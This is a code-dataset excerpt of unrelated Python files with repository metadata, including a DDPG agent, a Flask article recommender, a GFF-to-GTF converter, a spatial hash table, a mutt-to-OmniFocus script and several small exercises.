Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, self.params["tau"])
self.soft_update(self.actor_local, self.actor_target, self.params["tau"])
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
"""Ornstein-Uhlenbeck process.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
"""
def __init__(self, action_size, seed, num_agents, mu=0., theta=0.2, sigma=0.25):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones((num_agents, action_size))
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (=noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample"""
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * (np.random.standard_normal(size=x.shape))
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed):
"""Initialize a ReplayBuffer object.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
for s, a, r, s_next, d in zip(state, action, reward, next_state, done):
e = self.experience(s, a, r, s_next, d)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = (
torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)
)
dones = (
torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8))
.float().to(device)
)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
|
[
"[email protected]"
] | |
128d2a94962ecb1a54b4c9c3ca840004e656b188
|
9e241ae22cafe7ed4aaba2f06632420a63ec44fd
|
/Project 142/main.py
|
c30ed130f6ed02a9f977b69ffb0d69621d3dc3a8
|
[] |
no_license
|
Whitehat-Lataksh/Article-Recommending
|
b970f4d916733667aca20f85321710c1b40def62
|
ece145cc7b86288750339b38c319fd15e5490450
|
refs/heads/main
| 2023-08-11T20:23:14.510692 | 2021-09-17T04:55:17 | 2021-09-17T04:55:17 | 407,406,604 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,367 |
py
|
from flask import Flask, jsonify, request
from storage import all_articles, liked_articles, not_liked_articles
from demographic_filtering import output
from content_filtering import get_recommendations
app = Flask(__name__)
@app.route("/get-article")
def get_article():
movie_data = {
"url": all_articles[0][11],
"title": all_articles[0][12],
"text": all_articles[0][13],
"lang": all_articles[0][14],
"total_events": all_articles[0][15]
}
return jsonify({
"data": movie_data,
"status": "success"
})
@app.route("/liked-article", methods=["POST"])
def liked_article():
article = all_articles[0]
liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/unliked-article", methods=["POST"])
def unliked_article():
article = all_articles[0]
not_liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/popular-articles")
def popular_articles():
article_data = []
for article in output:
_d = {
"url": article[0],
"title": article[1],
"text": article[2],
"lang": article[3],
"total_events": article[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
@app.route("/recommended-articles")
def recommended_articles():
all_recommended = []
for liked_article in liked_articles:
output = get_recommendations(liked_article[4])
for data in output:
all_recommended.append(data)
import itertools
all_recommended.sort()
all_recommended = list(all_recommended for all_recommended,_ in itertools.groupby(all_recommended))
article_data = []
for recommended in all_recommended:
_d = {
"url": recommended[0],
"title": recommended[1],
"text": recommended[2],
"lang": recommended[3],
"total_events": recommended[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
if __name__ == "__main__":
app.run()
|
[
"[email protected]"
] | |
6ab95716a6bff065c2b13765723aee7964f0a87a
|
ef25f5fe6b74e2c84dd299de2e23c3487f9b0746
|
/python_exc/gff_to_gtf.py
|
8b9f067f870b1ab50db3376e17259da74df17ba1
|
[] |
no_license
|
feifei/python
|
32da1cb18ce19a05a62fc334ba4aab902b2cd0af
|
f0eaa69d5ca011e3075f9af56ef3aa756178e5e3
|
refs/heads/main
| 2023-05-30T19:14:06.132356 | 2021-06-04T13:45:03 | 2021-06-04T13:45:03 | 342,535,711 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,515 |
py
|
#!/usr/bin/env python
''' Convert GFF3 file to GTF,
only tested on EupathDB output, which is not a standard GFF3 file
'''
import os, re
import argparse
parser = argparse.ArgumentParser(description='Convert gff3 file to gtf file')
parser.add_argument('gff_file')
args = parser.parse_args()
gff_file = args.gff_file
basename, extension = os.path.splitext(gff_file)
gtf_file = basename + ".gtf"
with open (gff_file, 'r') as inh, open(gtf_file, 'w') as outh:
for line in inh:
if line.startswith("#"):
continue
scfid, source, feature, start, end, score, strand, frame, attr = line.split("\t")
if feature == "gene":
gene_id = re.match("ID=(.*?);", attr).group(1)
new_attr = "gene_id \"%s\";" %gene_id
transcript_id = gene_id + "_t"
elif feature == "exon":
exon_id = re.match("ID=(.*?);", attr).group(1)
exon_number = re.search("-(\d+)$", exon_id).group(1)
new_attr = "gene_id \"%s\"; transcript_id \"%s\"; exon_number \"%s\"; exon_id \"%s\";" %(gene_id, transcript_id, exon_number, exon_id)
else:
continue
print >>outh, "\t".join([scfid, source, feature, start, end, score, strand, frame, new_attr])
if feature == "gene":
new_attr = "gene_id \"%s\"; transcript_id \"%s\";" %(gene_id, transcript_id)
print >>outh, "\t".join([scfid, source, "transcript", start, end, score, strand, frame, new_attr])
|
[
"[email protected]"
] | |
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 |
MIT
| 2020-10-02T01:17:02 | 2019-05-22T07:33:46 |
Python
|
UTF-8
|
Python
| false | false | 1,824 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
"""The parameters for a task run request.
All required parameters must be populated in order to send to Azure.
:param is_archive_enabled: The value that indicates whether archiving is
enabled for the run or not. Default value: False .
:type is_archive_enabled: bool
:param type: Required. Constant filled by server.
:type type: str
:param task_name: Required. The name of task against which run has to be
queued.
:type task_name: str
:param values: The collection of overridable values that can be passed
when running a task.
:type values:
list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
"""
_validation = {
'type': {'required': True},
'task_name': {'required': True},
}
_attribute_map = {
'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'task_name': {'key': 'taskName', 'type': 'str'},
'values': {'key': 'values', 'type': '[SetValue]'},
}
def __init__(self, **kwargs):
super(TaskRunRequest, self).__init__(**kwargs)
self.task_name = kwargs.get('task_name', None)
self.values = kwargs.get('values', None)
self.type = 'TaskRunRequest'
|
[
"[email protected]"
] | |
c403719d00c3664c1b2cb6adf47318a985282c01
|
f54a87aa1196cbe9ac56dfab44295201444edeaf
|
/130818_FlaskTweets/ex.py
|
784dc936880419c67a4f50eee2b2e00e78ddae36
|
[] |
no_license
|
pythonflaskstudy2013/Weekly--Python-
|
66d291a1b48d3d7618235e1e141e1f1e40908ce2
|
5bf1416f10df3daa119d15f87c5cbb346ab6e81c
|
refs/heads/master
| 2020-03-27T01:11:07.148567 | 2013-09-01T04:13:46 | 2013-09-01T04:13:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,130 |
py
|
#!/usr/bin/env python
from flask import Flask
from flask import render_template, render_template_string, request
import math
app = Flask(__name__)
books = ['Programming in Scala', 'Mining the Social Web', 'Pattern-Oriented Software Architecture']
@app.route('/inherit')
def inherit():
return render_template('child.html')
@app.route('/books')
def list():
return render_template('books.html', books=books)
@app.route('/animals')
def animals():
return render_template('animals.html', animals=[
'cat', 'dog', 'pig', 'cow', 'sheep', 'panda', 'bear'
])
@app.route('/macro')
def forms():
return render_template('macro.html')
@app.route('/filter')
def filter():
return render_template('filter.html')
@app.route('/custom')
def custom():
return render_template('custom.html')
@app.template_filter()
def reverse(text):
return text[::-1]
@app.template_test()
def is_prime(n):
if n == 2:
return True
for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
if n % i == 0:
return False
return True
@app.template_global()
def whoami():
return 'My Name is Daegeun'
app.run(debug=True)
|
[
"[email protected]"
] | |
3bd778d2775c1fc9582037bb95bba1c5063b9273
|
5414512230d3fb1b6ba70d9f1eabb2bfaae6f337
|
/List_Array.py
|
702a09f18efc8a9dfd700bebedcdb4e42f672300
|
[] |
no_license
|
offenanil/dunder_method
|
950968d7eae9cf3d5714130f34997824a1e9b473
|
6956774f0aa06b7722431fce0dfebef595c01c97
|
refs/heads/main
| 2023-07-03T12:25:19.200499 | 2021-08-06T02:12:20 | 2021-08-06T02:12:20 | 392,276,739 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
# name = "Anil"
# age = 28
# phone = 984123
# address = 'Sydney'
# print(name,'', age,'',phone,'',address)
users = ['ram', 'sita', 'gita', 'hari']
# index start from o to infinity from left to right or first index refer as -infinity as well i.e last index will be -1
print(users)
# if i want to print gita only the syntax be like
print(users[2])
print(users[-2])
# output will be same in above case
|
[
"[email protected]"
] | |
00fe1a578edc91b4d4734fcc27e0575cc817ea1f
|
eef7c5e1ece154796b8c0b8a772cc172de1cba50
|
/hashTable.py
|
546a9c50e5c09441eff558180435dd68053d849b
|
[] |
no_license
|
NILOIDE/Coordinate_HashTable
|
957fdc2091daad47b39e591910ce880b7bd7f16c
|
5e761eefac10cec875b167df1903cd07129899d3
|
refs/heads/master
| 2020-06-15T23:28:31.299003 | 2019-07-05T14:37:58 | 2019-07-05T14:37:58 | 195,420,941 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,801 |
py
|
import numpy as np
class SpatialHashTable(object):
"""
Hash table used to split coordinate system into buckets. Objects can be assigned to all buckets
that overlap with the provided volume. A hash table is useful in cases where it becomes
inefficient to search through all items in the coordinate system. Assigning objects to buckets
allows for a selected retrieval of neighboring objects.
Written by: Nil Stolt Ansó, 05/07/2019
"""
def __init__(self, dims, bucket_size):
self.dims = dims
self.n_dims = dims.shape[0]
self.buckets_per_dim = np.ceil(dims / bucket_size).astype(np.int32)
self.bucket_size = bucket_size # Assuming buckets have equally sized sides
self.n_buckets = int(np.prod(self.buckets_per_dim))
self.buckets = {}
self.clear_buckets()
def get_nearby_objects(self, pos, radius):
"""
Given a position and radius, retrieve all objects in the overlapping buckets.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: Objects in buckets overlapping with given volume.
"""
cell_ids = self.get_ids_for_volume(pos, radius)
return self.get_objects_from_buckets(cell_ids)
def get_ids_for_volume(self, pos, radius):
"""
Retrieve the IDs of all buckets overlapping with the volume with the given center position
and given radius.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: IDs of buckets overlapping volume.
"""
ids = set()
lowest_pos = np.max((pos - radius, np.zeros((self.n_dims,))), axis=0)
lowest_bucket_lower_bound = (lowest_pos - lowest_pos % self.bucket_size).astype(np.int32)
highest_bucket_upper_bound = (np.min((self.dims, pos + radius + 1.0), axis=0)).astype(np.int32)
for x in range(lowest_bucket_lower_bound[0], highest_bucket_upper_bound[0], self.bucket_size):
for y in range(lowest_bucket_lower_bound[1], highest_bucket_upper_bound[1], self.bucket_size):
for z in range(lowest_bucket_lower_bound[2], highest_bucket_upper_bound[2], self.bucket_size):
ids.add(self.get_id(x, y, z))
return ids
def get_id(self, x, y, z):
"""
Get bucket ID containing the given Cartesian coordinate.
:param x:
:param y:
:param z:
:return:
"""
return x // self.bucket_size + y // self.bucket_size * self.buckets_per_dim[0] + \
z // self.bucket_size * self.buckets_per_dim[0] * self.buckets_per_dim[1]
def get_objects_from_buckets(self, ids):
"""
Given the IDs of buckets, return the union of every set obtained from each individual bucket.
:param ids: Indices of buckets.
:return: Union of objects found in those buckets.
"""
objects = set()
for i in ids:
objects = objects.union(self.buckets[i])
return objects
def clear_buckets(self):
"""
Remove all objects from all buckets in the hash table.
:return:
"""
for idx in range(self.n_buckets):
self.buckets[idx] = set()
def insert_object(self, obj, pos, radius):
"""
Insert an object into all buckets that overlap with the volume with center 'pos' and
radius 'radius'
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].add(obj)
def insert_objects(self, object_structure):
"""
Insert a structure of objects into hash table.
:param object_structure: Data structure where each row is of form (object, position, radius)
:return:
"""
for (obj, pos, radius) in object_structure:
self.insert_object(obj, pos, radius)
def get_dims(self):
"""
Get dimensions of hash table in terms of the coordinate system.
:return:
"""
return self.dims
def get_buckets_per_dim(self):
"""
Get how many buckets lay in each dimension.
:return: Tuple of number of buckets per dimension
"""
return self.buckets_per_dim
def get_buckets(self):
"""
Get all buckets.
:return:
"""
return self.buckets
def get_bucket_content(self, i):
"""
Get all objects in bucket of the given ID.
:param i: ID of the bucket
:return: Objects in the bucket with given ID.
"""
return self.buckets[i]
def get_bucket_center(self, i):
"""
Get the center coordinate (in terms of coordinate system) of bucket with given ID.
:param i: Index of bucket.
:return: Center coordinate of bucket.
"""
center = np.empty((self.n_dims,))
center[0] = i % self.dims[0] * self.bucket_size + self.bucket_size / 2
for d in range(1, self.n_dims):
center[d] = i // np.prod(self.dims[:d]) * self.bucket_size + self.bucket_size / 2
return center
def remove_object(self, obj, pos, radius):
"""
Remove object from all buckets overlapping with volume with center 'pos' and
radius 'radius'.
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].remove(obj)
|
[
"[email protected]"
] | |
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519 | 2021-08-25T02:15:28 | 2021-08-25T02:15:28 | 354,232,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
#삽입정렬
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]
for i in range(len(arr)):
for j in range(i,0,-1):
if arr[j]<arr[j-1]: #한칸씩 왼쪽으로 이동
arr[j],arr[j-1]=arr[j-1],arr[j]
else:
break
print(arr)
print("최종")
print(arr)
|
[
"[email protected]"
] | |
7c7062d3cb3ee5ceef84ad4f204bfa6737215dd7
|
15ae6eb98806ae70ac49b0a0214fab4c3d15e073
|
/数据科学基础/数据科学基础(/st_python/2017期末考试/大一班/ExhaustEmission.py
|
92ba2236c8a3e611613b64664a043bdf10b7d459
|
[] |
no_license
|
huyuework/professional-class
|
b423c42d401d9731f498e1c7fd0da2ebc819ba68
|
e1717c32370b7cc9d82ca7c098e57104b04af9c6
|
refs/heads/master
| 2023-08-21T21:38:32.333392 | 2021-10-06T07:56:08 | 2021-10-06T07:56:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,239 |
py
|
# -*- coding:utf-8 -*-
'''
log api example: log('output is: ' + str(output))
'''
from scipy.stats import t as T
from scipy.stats import f
import numpy as np
class Solution():
def solve(self):
t_2010 = ['6.0', '17.3', '104.3', '101.0', '120.4', '91.9', '30.0', '41.9', '23.9', '101.2',
'67.7', '48.7', '39.9', '49.0', '136.6', '117.6', '52.7', '64.9', '101.3', '83.5', '2.1',
'58.6', '94.6', '62.4', '41.8', '0.2', '74.2', '40.1', '12.7', '27.8', '51.5']
t_2014 = ['52041', '207793', '176469', '88880', '96190', '130672', '57246', '65987', '172867', '110665',
'82021', '41483', '76043', '40756', '81118', '106123', '96222', '21173', '65589', '33045', '1798',
'494415', '52040', '70603', '102842', '930', '69103', '72148', '71839', '92369', '74216']
d = []
for i in range(len(t_2010)):
d.append(float(t_2014[i]) - float(t_2010[i]) * 10000)
# print d
meanD = np.average(d)
Sd = np.std(d, ddof=1)
n = len(d)
t = meanD / (Sd / np.sqrt(n))
if t > T.isf(0.05, n - 1):
return [t, 'YES']
else:
return [t, 'NO']
so = Solution()
print so.solve()
|
[
"[email protected]"
] | |
26e5e03a43169c15a3fd647c4f0679d97ffa81ca
|
d80c7fe8288acfd02fa79e240183c418e522d1aa
|
/1-Basics/Test/Q3/Test.py
|
fe3ac9d72f23225da1bc1dff45214d3059d66be5
|
[] |
no_license
|
4ratkm88/COM404
|
82beeb84e7f6713a666038311e0d3e86d94ecc2e
|
5bf81d520ec44e19d15e2ee333c81542316c7833
|
refs/heads/master
| 2020-07-31T09:15:00.658014 | 2019-12-10T11:09:09 | 2019-12-10T11:09:09 | 210,556,814 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 166 |
py
|
print("How many zones must I cross?")
zone=int(input())
for zone in range(zone, 0, -1):
print("…crossed zone "+ str(zone))
print("Crossed all zones. Jumanji!")
|
[
"[email protected]"
] | |
4278e7b7f4ccb1865e1fc8e2c19350fb3bfb8177
|
2556d0bed5e90489ec8c93ad033db00b235e3de0
|
/main.py
|
e5979e99101b749dfa72a25e15f20ec0069e877e
|
[] |
no_license
|
weichih654/movie_review
|
dd08392d029c3d7614178e5c49e97b6c973f659b
|
47fabf41262318568bd7dbcafb34e0acb531b674
|
refs/heads/master
| 2021-01-10T02:14:22.864684 | 2016-03-21T11:01:23 | 2016-03-21T11:01:23 | 49,113,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 362 |
py
|
from libs.movie_review import MovieReview
from libs.review_searcher import ReviewSeacher
from libs.matcher import Matcher
if __name__ == "__main__":
searcher = ReviewSeacher("test")
reviews = []
reviews = searcher.reviews
for r in reviews:
review = MovieReview(r)
print "link = " + r
print "content = " + review.content
|
[
"[email protected]"
] | |
bcb16b3b56244d6ba5fc6daf20ec87ed4180b1ca
|
256afbb25a57bdc54b2c3e3e3fc7832c31c8467f
|
/mutt-to-omnifocus.py
|
224765e49122746dd7328bb35dbb13f24b8b17d3
|
[] |
no_license
|
jeauxlb/mutt-to-omnifocus
|
a3b3ba29ff83220c1ce5f52ba351d44e6bad3ac7
|
5d19b109057eeaad1c600c4e0d5dccc952a03546
|
refs/heads/master
| 2021-01-19T08:26:52.169184 | 2019-11-03T13:02:26 | 2019-11-03T13:02:26 | 87,630,521 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,832 |
py
|
#!/usr/bin/env python
import sys
import os
import getopt
import email.parser
import subprocess
from email.header import decode_header
def usage():
print """
Take an RFC-compliant e-mail message on STDIN and add a
corresponding task to the OmniFocus inbox for it.
Options:
-h, --help
Display this help text.
-q, --quick-entry
Use the quick entry panel instead of directly creating a task.
"""
def applescript_escape(string):
"""Applescript requires backslashes and double quotes to be escaped in
string. This returns the escaped string.
"""
if string is not None:
# Backslashes first (else you end up escaping your escapes)
string = string.replace('\\', '\\\\')
# Then double quotes
string = string.replace('"', '\\"')
return string
def parse_message(raw):
"""Parse a string containing an e-mail and produce a list containing the
significant headers. Each element is a tuple containing the name and
content of the header (list of tuples rather than dictionary to preserve
order).
"""
# Create a Message object
message = email.parser.Parser().parsestr(raw, headersonly=True)
# Extract relevant headers
list = [("Date", message.get("Date")),
("From", message.get("From")),
# ("Subject", message.get("Subject")),
("Message-ID", message.get("Message-ID"))]
try:
sub, encoding = decode_header(message.get("Subject"))[0]
sub = sub.replace('\n', '');
pipe = subprocess.Popen(['/Users/joel/bin/item_name.sh', sub], stdout=subprocess.PIPE)
subject, error = pipe.communicate()
list.append(["Subject", subject.rstrip('\n')])
except KeyboardInterrupt:
print ""
sys.exit()
return list
def send_to_omnifocus(params, quickentry=False):
"""Take the list of significant headers and create an OmniFocus inbox item
from these.
"""
# name and note of the task (escaped as per applescript_escape())
name = "%s" % applescript_escape(dict(params)["Subject"])
note = "\n".join(["%s: %s" % (k, applescript_escape(v)) for (k, v) in params])
# Write the Applescript
if quickentry:
applescript = """
tell application "OmniFocus"
tell default document
tell quick entry
open
make new inbox task with properties {name: "%s", note:"%s"}
select tree 1
set note expanded of tree 1 to true
end tell
end tell
end tell
""" % (name, note)
else:
applescript = """
tell application "OmniFocus"
tell default document
make new inbox task with properties {name: "%s", note:"%s"}
end tell
end tell
""" % (name, note)
# Use osascript and a heredoc to run this Applescript
os.system("\n".join(["osascript >/dev/null << EOT", applescript, "EOT"]))
def main():
# Check for options
try:
opts, args = getopt.getopt(sys.argv[1:], "hq", ["help", "quick-entry"])
except getopt.GetoptError:
usage()
sys.exit(-1)
# If an option was specified, do the right thing
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt in ("-q", "--quick-entry"):
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=True)
sys.exit(0)
# Otherwise fall back to standard operation
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=False)
sys.exit(0)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
9592e0575d2287aeb96b002e0a67d11474e08684
|
b83e9ded5aa46bf7c79a6cbce8a239a4ca0b38ba
|
/tests/utils_test.py
|
d4794967907dc4fe9f079e14a39ef5e15d4c4884
|
[
"Apache-2.0"
] |
permissive
|
pnickl/neural-tangents
|
55cb2800dc8067fff5024e995fbe953070f41905
|
79a47a60b5dd00d03c5ae5f9edb44ca66463fc1c
|
refs/heads/master
| 2022-12-27T03:48:29.453417 | 2020-09-30T17:21:22 | 2020-10-01T00:44:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,958 |
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
import jax.numpy as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
config.update('jax_numpy_rank_promotion', 'raise')
class UtilsTest(jtu.JaxTestCase):
def testIsOnCPU(self):
for dtype in [np.float32, np.float64]:
with self.subTest(dtype=dtype):
def x():
return random.normal(random.PRNGKey(1), (2, 3), dtype)
def x_cpu():
return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
x_jit = jit(x)
# x_cpu_jit = jit(x_cpu)
x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
self.assertTrue(utils.is_on_cpu(x_cpu()))
# TODO(mattjj): re-enable this when device_put under jit works
# self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
if xla_bridge.get_backend().platform == 'cpu':
self.assertTrue(utils.is_on_cpu(x()))
self.assertTrue(utils.is_on_cpu(x_jit()))
else:
self.assertFalse(utils.is_on_cpu(x()))
self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
absltest.main()
|
[
"[email protected]"
] | |
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854 | 2021-05-25T06:40:53 | 2021-05-25T06:40:53 | 330,888,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
'''
Список - упорядоченная структура данных, заключенная в квадратные
скобочки. Элементы разделены между собой запятой.
Чтобы создать список, необходимо придумать ему имя, поставить знак принадлежности (=)
и открыть квадратные скобки.
список = [1, 26, 15, 5.6, 'привет, Андрей']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']
# хочу вывести весь список
print(cars)
# хочу вывести из списка тойоту
print(cars[2])
print(cars[-1]) # вывести последний элемент списка
import random # модуль рандом создает случайности
print('My first car was', cars[random.randint(0, 4)])
# randint(a, b) - выдать случайное число (random int)
# в диапазоне от a до b
print(random.randint(-100, 100))
|
[
"[email protected]"
] | |
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058 | 2022-06-17T08:08:52 | 2022-06-17T08:08:52 | 233,500,101 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 349 |
py
|
import sys;
if __name__=='__main__':
t = int(input());
for i in range(t):
nd = input().split();
n=int(nd[0]); d=int(nd[1]);
ans =d;
x= list(map(int,input().rstrip().split()));
for j in x:
ans -= d % j
print('Case #%d: %d'%(i+1,ans))
|
[
"[email protected]"
] | |
5d842f89dca376141a6a97ff7ced4635dd7d4015
|
82aa64e423bcd2d2ae77a58552417bee0e2e3c9a
|
/Python/Basic Data Types/Lists.py
|
a42ace84b7ade4cfccefe4845b940184473c576a
|
[] |
no_license
|
abhi1362/HackerRank
|
7cdbb8a2fadd42e749fc5a7ce8635c2c303a9057
|
95dcd35ba554023c3d74c6e6574a1fbedc5e7845
|
refs/heads/master
| 2021-12-29T19:54:52.750399 | 2018-01-28T07:06:00 | 2018-01-28T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
if __name__ == '__main__':
N = int(input())
array_list = []
def print_():
print(array_list)
def sort():
array_list.sort()
def pop():
array_list.pop()
def insert():
array_list.insert(index,value)
def append():
array_list.append(value)
def reverse():
array_list.reverse()
def remove():
array_list.remove(value)
for i in range(0,N):
user_command = input()
command = user_command.split()
com = command[0]
if len(command) >= 2:
value = int(command[1])
index = value
if len(command)>=3:
value = int(command[2])
index = int(command[1])
commands ={
"insert":insert,
"remove":remove,
"pop":pop,
"reverse":reverse,
"append":append,
"insert":insert,
"sort":sort,
"print":print_,
}
commands[com]()
|
[
"[email protected]"
] | |
b103132e0bee93fd37295128ccea5a1e416e708e
|
3cdb4faf34d8375d6aee08bcc523adadcb0c46e2
|
/web/env/lib/python3.6/site-packages/django/db/models/sql/compiler.py
|
27b8cc343b29121d30713bacbde5e9dfc595aef5
|
[
"MIT",
"GPL-3.0-only"
] |
permissive
|
rizwansoaib/face-attendence
|
bc185d4de627ce5adab1cda7da466cb7a5fddcbe
|
59300441b52d32f3ecb5095085ef9d448aef63af
|
refs/heads/master
| 2020-04-25T23:47:47.303642 | 2019-09-12T14:26:17 | 2019-09-12T14:26:17 | 173,157,284 | 45 | 12 |
MIT
